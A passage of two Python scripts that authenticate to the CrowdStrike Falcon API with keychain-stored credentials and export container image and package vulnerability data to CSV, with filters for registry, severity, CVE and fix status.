--registry myregistry.azurecr.io\n\n  # Images with critical vulnerabilities\n  python3 falcon-image-assessment-report.py --severity critical\n\n  # Scanned in last 7 days\n  python3 falcon-image-assessment-report.py --last-scanned-after 2024-01-01\n\n  # Images affected by a specific CVE\n  python3 falcon-image-assessment-report.py --cve CVE-2024-1234\n\n  # Only running containers\n  python3 falcon-image-assessment-report.py --running-only\n\n  # Expand to one row per CVE (for per-vulnerability filtering)\n  python3 falcon-image-assessment-report.py --expand-vulns --severity critical\n\n  # Save output\n  python3 falcon-image-assessment-report.py --output /tmp/images.csv\n\"\"\"\n\nimport sys\nimport os\nimport json\nimport subprocess\nimport requests\nimport csv\nimport argparse\nfrom datetime import datetime, timezone, timedelta\nfrom typing import Optional\n\n\n# \u2500\u2500 Auth boilerplate \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef get_falcon_profile() -> str:\n    profile = os.getenv('FALCON_PROFILE')\n    if profile:\n        return profile\n    for path in ['.claude/memory/active-cid.txt',\n                 os.path.expanduser('~/.claude/projects/-Users-ykwan-Documents-code-knowledgebase/memory/active-cid.txt')]:\n        try:\n            with open(path) as f:\n                for line in f:\n                    if line.startswith('profile='):\n                        return line.strip().split('=', 1)[1]\n        except FileNotFoundError:\n            continue\n    return 'default'\n\n\ndef get_keychain_password(service: str, account: str, profile: Optional[str] = None) -> Optional[str]:\n    if profile is None:\n        profile = 
get_falcon_profile()\n    try:\n        result = subprocess.run(\n            ['security', 'find-generic-password', '-s', service, '-a', profile, '-w'],\n            capture_output=True, text=True, check=True)\n        return result.stdout.strip()\n    except subprocess.CalledProcessError:\n        pass\n    if profile == 'default':\n        try:\n            result = subprocess.run(\n                ['security', 'find-generic-password', '-s', 'crowdstrike-falcon-api', '-a', account, '-w'],\n                capture_output=True, text=True, check=True)\n            return result.stdout.strip()\n        except subprocess.CalledProcessError:\n            pass\n    return None\n\n\ndef get_oauth_token(base_url=\"https://api.crowdstrike.com\", profile=None):\n    if profile is None:\n        profile = get_falcon_profile()\n    client_id = get_keychain_password(\"falcon-client-id\", \"client-id\", profile)\n    client_secret = get_keychain_password(\"falcon-client-secret\", \"client-secret\", profile)\n    if not client_id or not client_secret:\n        print(f\"Credentials not found for profile: {profile}\")\n        print(f\"Run: /cid add {profile}\")\n        sys.exit(1)\n    url = f\"{base_url}/oauth2/token\"\n    data = {\"client_id\": client_id, \"client_secret\": client_secret}\n    resp = requests.post(url, headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data=data)\n    if resp.status_code != 201:\n        print(f\"Auth failed: {resp.status_code} {resp.text}\")\n        sys.exit(1)\n    return resp.json()[\"access_token\"]\n\n\n# \u2500\u2500 API helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef 
fetch_images_page(token, fql_filter, offset, limit, expand_vulns, base_url):\n    \"\"\"Single page from /container-security/combined/images/export/v1\"\"\"\n    url = f\"{base_url}/container-security/combined/images/export/v1\"\n    params = {\n        \"limit\": limit,\n        \"offset\": offset,\n        \"expand_vulnerabilities\": \"true\" if expand_vulns else \"false\",\n        \"expand_detections\": \"false\",\n        \"sort\": \"last_seen.desc\",\n    }\n    if fql_filter:\n        params[\"filter\"] = fql_filter\n    headers = {\"Authorization\": f\"Bearer {token}\"}\n    resp = requests.get(url, headers=headers, params=params)\n    if resp.status_code != 200:\n        print(f\"  API error {resp.status_code}: {resp.text[:300]}\")\n        return [], 0\n    body = resp.json()\n    resources = body.get(\"resources\") or []\n    total = body.get(\"meta\", {}).get(\"pagination\", {}).get(\"total\", len(resources))\n    return resources, total\n\n\ndef fetch_all_images(token, fql_filter, expand_vulns, base_url, page_size=500):\n    \"\"\"Paginate through all matching images.\"\"\"\n    all_images = []\n    offset = 0\n    total = None\n    while True:\n        batch, total = fetch_images_page(token, fql_filter, offset, page_size, expand_vulns, base_url)\n        if not batch:\n            break\n        all_images.extend(batch)\n        print(f\"  Fetched {len(all_images)} / {total}\", end=\"\\r\")\n        if len(all_images) &gt;= total or len(batch) &lt; page_size:\n            break\n        offset += page_size\n    print()\n    return all_images, total\n\n\n# \u2500\u2500 Flattening 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef safe_get(d, *keys, default=\"\"):\n    \"\"\"Nested dict get with default.\"\"\"\n    for k in keys:\n        if not isinstance(d, dict):\n            return default\n        d = d.get(k, default)\n    return d if d != \"\" or default == \"\" else default\n\n\ndef flatten_image_base(img):\n    \"\"\"Extract all standard image fields into a flat dict.\"\"\"\n    # Vulnerability counts - API may return nested or flat depending on endpoint\n    vuln = img.get(\"vulnerabilities\") or {}\n    if isinstance(vuln, list):\n        # Expanded mode - list of CVE objects; summarise counts\n        sev_counts = {\"critical\": 0, \"high\": 0, \"medium\": 0, \"low\": 0, \"negligible\": 0}\n        for v in vuln:\n            s = (v.get(\"severity\") or \"\").lower()\n            if s in sev_counts:\n                sev_counts[s] += 1\n        vuln_summary = sev_counts\n        vuln_list = vuln\n    else:\n        vuln_summary = vuln\n        vuln_list = []\n\n    detection = img.get(\"detections\") or {}\n\n    # Build labels - present if API returns them; not FQL-filterable today\n    labels = img.get(\"labels\") or img.get(\"build_labels\") or {}\n    labels_str = \"; \".join(f\"{k}={v}\" for k, v in labels.items()) if isinstance(labels, dict) else str(labels)\n\n    row = {\n        # Identity\n        \"image_id\":                img.get(\"id\") or img.get(\"image_id\", \"\"),\n        \"image_digest\":            img.get(\"image_digest\", \"\"),\n        \"registry\":                img.get(\"registry\", \"\"),\n        \"repository\":              img.get(\"repository\", \"\"),\n        
\"tag\":                     img.get(\"tag\", \"\"),\n        \"source\":                  img.get(\"source\", \"\"),\n        # Properties\n        \"arch\":                    img.get(\"arch\", \"\"),\n        \"base_os\":                 img.get(\"base_os\", \"\"),\n        \"multi_arch\":              img.get(\"multi_arch\", \"\"),\n        # Runtime\n        \"container_id\":            img.get(\"container_id\", \"\"),\n        \"container_running_status\": img.get(\"container_running_status\", \"\"),\n        # Timestamps\n        \"first_seen\":              img.get(\"first_seen\", \"\"),\n        \"last_seen\":               img.get(\"last_seen\", \"\"),\n        # Scores\n        \"cps_rating\":              img.get(\"highest_cps_current_rating\", \"\"),\n        # Vulnerabilities\n        \"vuln_critical\":           vuln_summary.get(\"critical\", 0),\n        \"vuln_high\":               vuln_summary.get(\"high\", 0),\n        \"vuln_medium\":             vuln_summary.get(\"medium\", 0),\n        \"vuln_low\":                vuln_summary.get(\"low\", 0),\n        \"vuln_negligible\":         vuln_summary.get(\"negligible\", 0),\n        \"vuln_total\":              img.get(\"vulnerability_count\", sum(vuln_summary.get(s, 0) for s in [\"critical\",\"high\",\"medium\",\"low\",\"negligible\"])),\n        \"highest_vuln_severity\":   img.get(\"highest_vulnerability_severity\", \"\"),\n        # Detections\n        \"detection_count\":         img.get(\"detection_count\", safe_get(detection, \"total\")),\n        \"highest_detection_severity\": img.get(\"highest_detection_severity\", \"\"),\n        # Packages / layers\n        \"package_count\":           img.get(\"packages\", \"\"),\n        \"layers_with_vulns\":       img.get(\"layers_with_vulnerabilities\", \"\"),\n        # Build metadata\n        \"build_labels\":            labels_str,\n    }\n    return row, vuln_list\n\n\ndef expand_vuln_rows(base_row, vuln_list):\n    \"\"\"Return one row per CVE 
for expanded mode.\"\"\"\n    if not vuln_list:\n        return [base_row]\n    rows = []\n    for v in vuln_list:\n        row = dict(base_row)\n        row[\"cve_id\"] = v.get(\"cve_id\", \"\")\n        row[\"cve_severity\"] = v.get(\"severity\", \"\")\n        row[\"cvss_score\"] = v.get(\"cvss_score\", \"\")\n        row[\"cve_description\"] = v.get(\"description\", \"\")\n        row[\"fix_status\"] = v.get(\"fix_status\", \"\")\n        row[\"remediation\"] = v.get(\"remediation\", \"\")\n        row[\"exploited_status\"] = v.get(\"exploited_status\", \"\")\n        row[\"package_name\"] = v.get(\"package_name\", \"\")\n        row[\"package_version\"] = v.get(\"package_version\", \"\")\n        row[\"package_path\"] = v.get(\"package_path\", \"\")\n        rows.append(row)\n    return rows\n\n\n# \u2500\u2500 FQL filter builder \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef build_fql(args):\n    parts = []\n    if args.registry:\n        parts.append(f\"registry:'{args.registry}'\")\n    if args.repository:\n        parts.append(f\"repository:'{args.repository}'\")\n    if args.tag:\n        parts.append(f\"tag:'{args.tag}'\")\n    if args.severity:\n        parts.append(f\"vulnerability_severity:'{args.severity}'\")\n    if args.cve:\n        parts.append(f\"cve_id:'{args.cve}'\")\n    if args.running_only:\n        parts.append(\"container_running_status:true\")\n    if args.last_scanned_after:\n        ts = args.last_scanned_after\n        if len(ts) == 10:  # date only \u2192 add time\n            ts += \"T00:00:00Z\"\n        parts.append(f\"last_seen:&gt;='{ts}'\")\n    if args.last_scanned_before:\n        ts = args.last_scanned_before\n        if len(ts) == 
10:\n            ts += \"T23:59:59Z\"\n        parts.append(f\"last_seen:&lt;='{ts}'\")\n    return \"+\".join(parts) if parts else None\n\n\n# \u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef main():\n    parser = argparse.ArgumentParser(\n        description=\"Export Falcon Container Image Assessment data to CSV with ALL fields.\")\n    parser.add_argument(\"--profile\", help=\"CID profile (default: active profile)\")\n    parser.add_argument(\"--registry\", help=\"Filter by registry (e.g. myregistry.azurecr.io)\")\n    parser.add_argument(\"--repository\", help=\"Filter by repository name\")\n    parser.add_argument(\"--tag\", help=\"Filter by image tag\")\n    parser.add_argument(\"--severity\", choices=[\"critical\",\"high\",\"medium\",\"low\"],\n                        help=\"Filter by highest vulnerability severity\")\n    parser.add_argument(\"--cve\", help=\"Filter images affected by a specific CVE\")\n    parser.add_argument(\"--running-only\", action=\"store_true\",\n                        help=\"Only include currently running containers\")\n    parser.add_argument(\"--last-scanned-after\", metavar=\"DATE\",\n                        help=\"Only images scanned after this date (YYYY-MM-DD or ISO8601)\")\n    parser.add_argument(\"--last-scanned-before\", metavar=\"DATE\",\n                        help=\"Only images scanned before this date (YYYY-MM-DD or ISO8601)\")\n    parser.add_argument(\"--expand-vulns\", action=\"store_true\",\n                        help=\"One row per CVE (instead of one row per image)\")\n    parser.add_argument(\"--output\", \"-o\", 
default=\"-\",\n                        help=\"Output CSV file path (default: stdout)\")\n    parser.add_argument(\"--limit\", type=int, default=5000,\n                        help=\"Max images to fetch (default: 5000)\")\n    args = parser.parse_args()\n\n    profile = args.profile or get_falcon_profile()\n    region = get_keychain_password(\"falcon-cloud-region\", \"region\", profile) or \"us-1\"\n    base_url = \"https://api.crowdstrike.com\" if region == \"us-1\" else f\"https://api.{region}.crowdstrike.com\"\n\n    print(f\"=== Falcon Image Assessment Report ===\", file=sys.stderr)\n    print(f\"Profile: {profile}  Region: {region}\", file=sys.stderr)\n\n    token = get_oauth_token(base_url, profile=profile)\n    print(\"\u2713 Authenticated\", file=sys.stderr)\n\n    fql = build_fql(args)\n    if fql:\n        print(f\"Filter: {fql}\", file=sys.stderr)\n\n    print(\"Fetching images...\", file=sys.stderr)\n    images, total = fetch_all_images(token, fql, args.expand_vulns, base_url,\n                                      page_size=min(500, args.limit))\n    if total and len(images) &lt; total:\n        print(f\"\u26a0  Fetched {len(images)} of {total} total (increase --limit to get all)\", file=sys.stderr)\n    print(f\"\u2713 {len(images)} images retrieved\", file=sys.stderr)\n\n    if not images:\n        print(\"No images found matching filters.\", file=sys.stderr)\n        sys.exit(0)\n\n    # Build rows\n    all_rows = []\n    for img in images:\n        base_row, vuln_list = flatten_image_base(img)\n        if args.expand_vulns:\n            all_rows.extend(expand_vuln_rows(base_row, vuln_list))\n        else:\n            all_rows.append(base_row)\n\n    # Write CSV\n    fieldnames = list(all_rows[0].keys())\n\n    out = open(args.output, \"w\", newline=\"\") if args.output != \"-\" else sys.stdout\n    writer = csv.DictWriter(out, fieldnames=fieldnames, extrasaction=\"ignore\")\n    writer.writeheader()\n    writer.writerows(all_rows)\n    if 
args.output != \"-\":\n        out.close()\n        print(f\"\u2713 Written to {args.output}  ({len(all_rows)} rows)\", file=sys.stderr)\n    else:\n        print(f\"\\n\u2713 {len(all_rows)} rows written\", file=sys.stderr)\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n#!/usr/bin/env python3\n\"\"\"\nFalcon Package Vulnerability Report - Exploded CVE Format\nOne row per (package \u00d7 CVE) combination. Fixes the \"combined fields\" CSV problem.\n\nFixes:\n  - Package Vulnerabilities CSV combines all CVE IDs into one field \u2192 each CVE = own row\n  - Can't filter by a specific CVE to see every affected package \u2192 use --cve\n  - Missing image/container context per package \u2192 includes image list per package+CVE\n  - CVE descriptions and remediations combined \u2192 each in its own column\n\nUsage:\n  # All packages with vulnerabilities\n  python3 falcon-package-cve-report.py\n\n  # See every package affected by a specific CVE\n  python3 falcon-package-cve-report.py --cve CVE-2024-1234\n\n  # Critical and high only\n  python3 falcon-package-cve-report.py --severity critical\n  python3 falcon-package-cve-report.py --severity high\n\n  # Fixable vulnerabilities only\n  python3 falcon-package-cve-report.py --fix-available\n\n  # Filter by registry (to scope to Azure Container Apps images)\n  python3 falcon-package-cve-report.py --registry myregistry.azurecr.io\n\n  # Save output\n  python3 falcon-package-cve-report.py --cve CVE-2024-1234 --output /tmp/cve-impact.csv\n\"\"\"\n\nimport sys\nimport os\nimport json\nimport subprocess\nimport requests\nimport csv\nimport argparse\nfrom typing import Optional\n\n\n# \u2500\u2500 Auth boilerplate 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef get_falcon_profile() -&gt; str:\n    profile = os.getenv('FALCON_PROFILE')\n    if profile:\n        return profile\n    for path in ['.claude/memory/active-cid.txt',\n                 os.path.expanduser('~/.claude/projects/-Users-ykwan-Documents-code-knowledgebase/memory/active-cid.txt')]:\n        try:\n            with open(path) as f:\n                for line in f:\n                    if line.startswith('profile='):\n                        return line.strip().split('=', 1)[1]\n        except FileNotFoundError:\n            continue\n    return 'default'\n\n\ndef get_keychain_password(service: str, account: str, profile: Optional[str] = None) -&gt; Optional[str]:\n    if profile is None:\n        profile = get_falcon_profile()\n    try:\n        result = subprocess.run(\n            ['security', 'find-generic-password', '-s', service, '-a', profile, '-w'],\n            capture_output=True, text=True, check=True)\n        return result.stdout.strip()\n    except subprocess.CalledProcessError:\n        pass\n    if profile == 'default':\n        try:\n            result = subprocess.run(\n                ['security', 'find-generic-password', '-s', 'crowdstrike-falcon-api', '-a', account, '-w'],\n                capture_output=True, text=True, check=True)\n            return result.stdout.strip()\n        except subprocess.CalledProcessError:\n            pass\n    return None\n\n\ndef get_oauth_token(base_url=\"https://api.crowdstrike.com\", profile=None):\n    if profile is None:\n        profile = get_falcon_profile()\n    client_id = get_keychain_password(\"falcon-client-id\", \"client-id\", profile)\n    
client_secret = get_keychain_password(\"falcon-client-secret\", \"client-secret\", profile)\n    if not client_id or not client_secret:\n        print(f\"Credentials not found for profile: {profile}\")\n        print(f\"Run: /cid add {profile}\")\n        sys.exit(1)\n    url = f\"{base_url}/oauth2/token\"\n    data = {\"client_id\": client_id, \"client_secret\": client_secret}\n    resp = requests.post(url, headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data=data)\n    if resp.status_code != 201:\n        print(f\"Auth failed: {resp.status_code} {resp.text}\")\n        sys.exit(1)\n    return resp.json()[\"access_token\"]\n\n\n# \u2500\u2500 API: Package export (with embedded CVEs) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef fetch_packages_page(token, fql_filter, offset, limit, base_url):\n    \"\"\"GET /container-security/combined/packages-export/v1\"\"\"\n    url = f\"{base_url}/container-security/combined/packages-export/v1\"\n    params = {\"limit\": limit, \"offset\": offset}\n    if fql_filter:\n        params[\"filter\"] = fql_filter\n    headers = {\"Authorization\": f\"Bearer {token}\"}\n    resp = requests.get(url, headers=headers, params=params)\n    if resp.status_code != 200:\n        print(f\"  API error {resp.status_code}: {resp.text[:400]}\", file=sys.stderr)\n        return [], 0\n    body = resp.json()\n    resources = body.get(\"resources\") or []\n    total = body.get(\"meta\", {}).get(\"pagination\", {}).get(\"total\", len(resources))\n    return resources, total\n\n\ndef fetch_all_packages(token, fql_filter, base_url, page_size=500):\n    all_pkgs = []\n    offset = 0\n    total = None\n    while True:\n        batch, total = fetch_packages_page(token, fql_filter, offset, page_size, base_url)\n        if not batch:\n            break\n        
all_pkgs.extend(batch)\n        print(f\"  Fetched {len(all_pkgs)} / {total}\", end=\"\\r\", file=sys.stderr)\n        if len(all_pkgs) &gt;= total or len(batch) &lt; page_size:\n            break\n        offset += page_size\n    print(file=sys.stderr)\n    return all_pkgs, total\n\n\n# \u2500\u2500 API: CVE-specific vulnerability info (images + packages per CVE) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef fetch_vuln_info(token, cve_id, base_url, limit=500):\n    \"\"\"\n    GET /container-security/combined/vulnerabilities-info/v1\n    Returns package + image data for a single CVE.\n    Use this for --cve mode to get the most complete picture.\n    \"\"\"\n    url = f\"{base_url}/container-security/combined/vulnerabilities-info/v1\"\n    all_results = []\n    offset = 0\n    while True:\n        params = {\"cve_id\": cve_id, \"limit\": limit, \"offset\": offset}\n        headers = {\"Authorization\": f\"Bearer {token}\"}\n        resp = requests.get(url, headers=headers, params=params)\n        if resp.status_code != 200:\n            print(f\"  vuln-info error {resp.status_code}: {resp.text[:300]}\", file=sys.stderr)\n            break\n        body = resp.json()\n        batch = body.get(\"resources\") or []\n        all_results.extend(batch)\n        total = body.get(\"meta\", {}).get(\"pagination\", {}).get(\"total\", len(batch))\n        if len(all_results) &gt;= total or len(batch) &lt; limit:\n            break\n        offset += limit\n    return all_results\n\n\n# \u2500\u2500 Row builders \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef explode_package_to_rows(pkg):\n    \"\"\"\n    Convert one package 
record (with embedded vulnerabilities list) into\n    N rows, one per CVE.\n    \"\"\"\n    # Package-level fields\n    base = {\n        \"package_name\":        pkg.get(\"package_name\") or pkg.get(\"name\", \"\"),\n        \"package_version\":     pkg.get(\"package_version\") or pkg.get(\"version\", \"\"),\n        \"package_type\":        pkg.get(\"type\", \"\"),\n        \"package_path\":        pkg.get(\"package_path\") or pkg.get(\"path\", \"\"),\n        \"license\":             pkg.get(\"license\", \"\"),\n        \"fix_status\":          pkg.get(\"fix_status\", \"\"),\n        \"running_images_count\": pkg.get(\"running_images_count\", \"\"),\n        \"all_images_count\":    pkg.get(\"images_count\", \"\"),\n        # Image context - API may return a list of images for this package\n        \"affected_registries\": \"; \".join(set(\n            i.get(\"registry\", \"\") for i in (pkg.get(\"images\") or []) if i.get(\"registry\")\n        )),\n        \"affected_repositories\": \"; \".join(set(\n            i.get(\"repository\", \"\") for i in (pkg.get(\"images\") or []) if i.get(\"repository\")\n        )),\n        \"affected_image_ids\":  \"; \".join(\n            i.get(\"image_id\") or i.get(\"id\", \"\") for i in (pkg.get(\"images\") or [])[:20]\n        ),\n        \"affected_image_tags\": \"; \".join(\n            f\"{i.get('repository','')}:{i.get('tag','')}\" for i in (pkg.get(\"images\") or [])[:20]\n        ),\n        \"affected_container_ids\": \"; \".join(\n            i.get(\"container_id\", \"\") for i in (pkg.get(\"images\") or []) if i.get(\"container_id\")\n        ),\n    }\n\n    vulns = pkg.get(\"vulnerabilities\") or pkg.get(\"cve_ids\") or []\n\n    if not vulns:\n        # No CVE data embedded - return one row with empty CVE fields\n        row = dict(base)\n        row.update({\n            \"cve_id\": \"\",\n            \"severity\": \"\",\n            \"cvss_score\": \"\",\n            \"description\": \"\",\n            
\"remediation\": \"\",\n            \"fix_available\": \"\",\n            \"exploited_status\": \"\",\n            \"is_zero_day\": \"\",\n            \"published_date\": \"\",\n        })\n        return [row]\n\n    rows = []\n    for v in vulns:\n        # vulns may be strings (CVE IDs) or dicts depending on endpoint\n        if isinstance(v, str):\n            row = dict(base)\n            row.update({\n                \"cve_id\": v,\n                \"severity\": \"\",\n                \"cvss_score\": \"\",\n                \"description\": \"\",\n                \"remediation\": \"\",\n                \"fix_available\": \"\",\n                \"exploited_status\": \"\",\n                \"is_zero_day\": \"\",\n                \"published_date\": \"\",\n            })\n        else:\n            row = dict(base)\n            row.update({\n                \"cve_id\":          v.get(\"cve_id\", \"\"),\n                \"severity\":        v.get(\"severity\", \"\"),\n                \"cvss_score\":      v.get(\"cvss_score\", \"\"),\n                \"description\":     v.get(\"description\", \"\"),\n                \"remediation\":     v.get(\"remediation\", \"\"),\n                \"fix_available\":   v.get(\"fix_status\", \"\") or base[\"fix_status\"],\n                \"exploited_status\": v.get(\"exploited_status\", \"\"),\n                \"is_zero_day\":     v.get(\"is_zero_day\", \"\"),\n                \"published_date\":  v.get(\"published_date\", \"\"),\n            })\n        rows.append(row)\n    return rows\n\n\ndef rows_from_vuln_info(cve_id, resources):\n    \"\"\"\n    Build rows from /vulnerabilities-info/v1 response.\n    Each resource is a package with embedded image list.\n    \"\"\"\n    rows = []\n    for r in resources:\n        row = {\n            \"cve_id\":          cve_id,\n            \"severity\":        r.get(\"severity\", \"\"),\n            \"cvss_score\":      r.get(\"cvss_score\", \"\"),\n            \"description\":     
r.get(\"description\", \"\"),\n            \"remediation\":     r.get(\"remediation\", \"\"),\n            \"fix_available\":   r.get(\"fix_status\", \"\"),\n            \"exploited_status\": r.get(\"exploited_status\", \"\"),\n            \"is_zero_day\":     r.get(\"is_zero_day\", \"\"),\n            \"published_date\":  r.get(\"published_date\", \"\"),\n            \"package_name\":    r.get(\"package_name\", \"\"),\n            \"package_version\": r.get(\"package_version\", \"\"),\n            \"package_type\":    r.get(\"package_type\") or r.get(\"type\", \"\"),\n            \"package_path\":    r.get(\"package_path\", \"\"),\n            \"license\":         r.get(\"license\", \"\"),\n            \"running_images_count\": r.get(\"running_images_count\", \"\"),\n            \"all_images_count\": r.get(\"images_count\", \"\"),\n            # Affected images list\n            \"affected_registries\":    \"; \".join(set(\n                i.get(\"registry\", \"\") for i in (r.get(\"images\") or []) if i.get(\"registry\")\n            )),\n            \"affected_repositories\":  \"; \".join(set(\n                i.get(\"repository\", \"\") for i in (r.get(\"images\") or []) if i.get(\"repository\")\n            )),\n            \"affected_image_tags\":    \"; \".join(\n                f\"{i.get('repository','')}:{i.get('tag','')}\" for i in (r.get(\"images\") or [])[:30]\n            ),\n            \"affected_image_ids\":     \"; \".join(\n                i.get(\"image_id\") or i.get(\"id\", \"\") for i in (r.get(\"images\") or [])[:30]\n            ),\n            \"affected_container_ids\": \"; \".join(\n                i.get(\"container_id\", \"\") for i in (r.get(\"images\") or []) if i.get(\"container_id\")\n            ),\n        }\n        rows.append(row)\n    return rows\n\n\n# \u2500\u2500 FQL builder 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef build_fql(args):\n    parts = []\n    if args.severity:\n        parts.append(f\"severity:'{args.severity}'\")\n    if args.registry:\n        # package API filters by image metadata\n        parts.append(f\"registry:'{args.registry}'\")\n    if args.cve:\n        parts.append(f\"cveid:'{args.cve}'\")\n    if args.fix_available:\n        parts.append(\"fix_status:'TRUE'\")\n    return \"+\".join(parts) if parts else None\n\n\n# \u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef main():\n    parser = argparse.ArgumentParser(\n        description=\"Export package vulnerabilities as one row per CVE (fixes combined-fields CSV).\")\n    parser.add_argument(\"--profile\", help=\"CID profile\")\n    parser.add_argument(\"--cve\", help=\"Show all packages affected by this CVE (e.g. 
CVE-2024-1234)\")\n    parser.add_argument(\"--severity\", choices=[\"critical\",\"high\",\"medium\",\"low\"],\n                        help=\"Filter by vulnerability severity\")\n    parser.add_argument(\"--registry\", help=\"Filter by image registry\")\n    parser.add_argument(\"--fix-available\", action=\"store_true\",\n                        help=\"Only include vulnerabilities with a fix available\")\n    parser.add_argument(\"--output\", \"-o\", default=\"-\",\n                        help=\"Output CSV path (default: stdout)\")\n    parser.add_argument(\"--limit\", type=int, default=5000,\n                        help=\"Max packages to fetch (default: 5000)\")\n    args = parser.parse_args()\n\n    profile = args.profile or get_falcon_profile()\n    region = get_keychain_password(\"falcon-cloud-region\", \"region\", profile) or \"us-1\"\n    base_url = \"https://api.crowdstrike.com\" if region == \"us-1\" else f\"https://api.{region}.crowdstrike.com\"\n\n    print(\"=== Falcon Package CVE Report ===\", file=sys.stderr)\n    print(f\"Profile: {profile}  Region: {region}\", file=sys.stderr)\n\n    token = get_oauth_token(base_url, profile=profile)\n    print(\"\u2713 Authenticated\", file=sys.stderr)\n\n    all_rows = []\n\n    if args.cve:\n        # CVE-first mode: use vulnerabilities-info endpoint for richest data\n        print(f\"Fetching all packages affected by {args.cve}...\", file=sys.stderr)\n        resources = fetch_vuln_info(token, args.cve, base_url)\n        print(f\"\u2713 {len(resources)} package records found\", file=sys.stderr)\n        all_rows = rows_from_vuln_info(args.cve, resources)\n    else:\n        # Package-first mode: dump all packages with exploded CVEs\n        fql = build_fql(args)\n        if fql:\n            print(f\"Filter: {fql}\", file=sys.stderr)\n        print(\"Fetching packages...\", file=sys.stderr)\n        packages, total = fetch_all_packages(token, fql, base_url,\n                                              
